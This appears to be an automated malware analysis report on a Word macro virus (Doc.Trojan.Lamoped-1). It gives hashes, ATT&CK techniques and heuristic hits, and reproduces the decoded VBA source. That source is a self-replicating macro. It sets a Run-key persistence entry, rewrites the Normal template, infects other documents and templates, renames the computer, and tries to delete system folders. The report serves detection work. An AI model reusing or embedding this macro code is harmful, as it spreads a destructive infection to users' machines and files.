Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6cb7f79c7dbc59af…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 31.0 KB
Created: 2002-10-11 03:37:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: cdefab15a9d71bc00c9ab89c83afc2c6
SHA-1: ef2856b2bfd4d55c208695b8abca631f7329d4cc
SHA-256: 6cb7f79c7dbc59afa33e783a02e51ac6e9f7029c625d3f3bfe1193ef1aeaa5be
Risk score: 228

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1505.003 Server Software Component: Visual Basic for Applications

The sample contains VBA macros that execute upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The script attempts to establish persistence by writing the registry value 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\p.r.s' with the path 'C:\p.r.s.vbs'. It also attempts to embed itself into the Word Normal template by manipulating VBComponents.

Heuristics (5)

  • ClamAV: Doc.Trojan.Lamoped-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Lamoped-1
  • Reference to Windows Script Host (high, SC_STR_WSCRIPT)
    Reference to Windows Script Host
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched lines in script:
      Open "C:\p.r.s.vbs" For Output As #1
      Print #1, "Set wordobj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
      Print #1, "p.r.s = wscript.ScriptFullName"
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched lines in script:
      End If
      Private Sub Document_Open()
      'W2000\VBS.P.R.S

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  3589 bytes

SHA-256: dcc6dbaee886019e78581240f5dc79e6b101023db8a6c99ebaeda1b22df3635b
Detection: ClamAV: Doc.Trojan.Lamoped-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "THIS DOCUMENT"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Sub Document_Close()
On Error Resume Next
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "p.r.s") = "C:\p.r.s.vbs"
Open "C:\p.r.s.vbs" For Output As #1
Print #1, "Set wordobj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "p.r.s = wscript.ScriptFullName"
Print #1, "Set NT = wordobj.NormalTemplate.VBProject.VBComponents.Item(1)"
Print #1, "NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines"
Print #1, "NT.CodeModule.AddFromFile p.r.s"
Print #1, "NT.CodeModule.DeleteLines 1, 7"
Print #1, "wordobj.Quit"
Print #1, TD
Close #1
Set wordobj = CreateObject("Word.Application")
p.r.s = wscript.ScriptFullName
Set NT = wordobj.NormalTemplate.VBProject.VBComponents.Item(1)
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.CodeModule.AddFromFile p.r.s
NT.CodeModule.DeleteLines 1, 9
wordobj.Quit
End If
Next
For MainLoop = 1 To 2
If MainLoop = 1 Then Set Target = Documents Else Set Target = Templates
For TargetCount = 1 To Target.Count
Set TargetComponents = Target(TargetCount).VBProject.VBComponents
For ModuleCount = 1 To TargetComponents.Count
Function_Exist = False
TargetCodeChanged = False
For TargetLines = 1 To TargetComponents(ModuleCount).CodeModule.CountOfLines

If TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1) = "Private Function p.r.s()" Then Function_Exist = True
If Left(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 12) = "Private Sub " And Right(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 8) <> ": p.r.s" Then
TargetComponents(ModuleCount).CodeModule.ReplaceLine TargetLines, TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1) & ": p.r.s"
TargetCodeChanged = True

ElseIf Left(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 4) = "Sub " And Right(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 8) <> ": p.r.s" Then
TargetComponents(ModuleCount).CodeModule.ReplaceLine TargetLines, TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1) & ": p.r.s"
TargetCodeChanged = True
End If
Next
If Function_Exist = False Then TargetComponents(ModuleCount).CodeModule.AddFromString MyCode
If Function_Exits = False Or TargetCodeChanged = True Then

If MainLoop = 1 Then Documents(TargetCount).SaveAs FileName:=Documents(TargetCount).FullName
If MainLoop = 2 Then Templates(TargetCount).Save
End If
Next
Next
Next
End Function
Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" _
(ByVal lpComputerName As String) As Long
Name = SetComputerName("AHSAN JUTT VXER")
End If
Public Declare Function RemoveDirectory Lib "kernel32" Alias "RemoveDirectoryA" _
(ByVal lpPathName As String) As Long
If Day(Now()) = Int(Rnd() * 30 + 1) Then
num = Int(Rnd * 4) + 1 '
If num = 1 Then fuck$ = "C:\Windows"
If num = 2 Then fuck$ = "C:\Program Files"
If num = 3 Then fuck$ = "C:\My documents"
Lwinfuck = RemoveDirectory(fuck$)
End If
Private Sub Document_Open()
'W2000\VBS.P.R.S
'CREATED BY A.v_Killer(Pakbarin) PAKISTAN , SAHIWAL
End Sub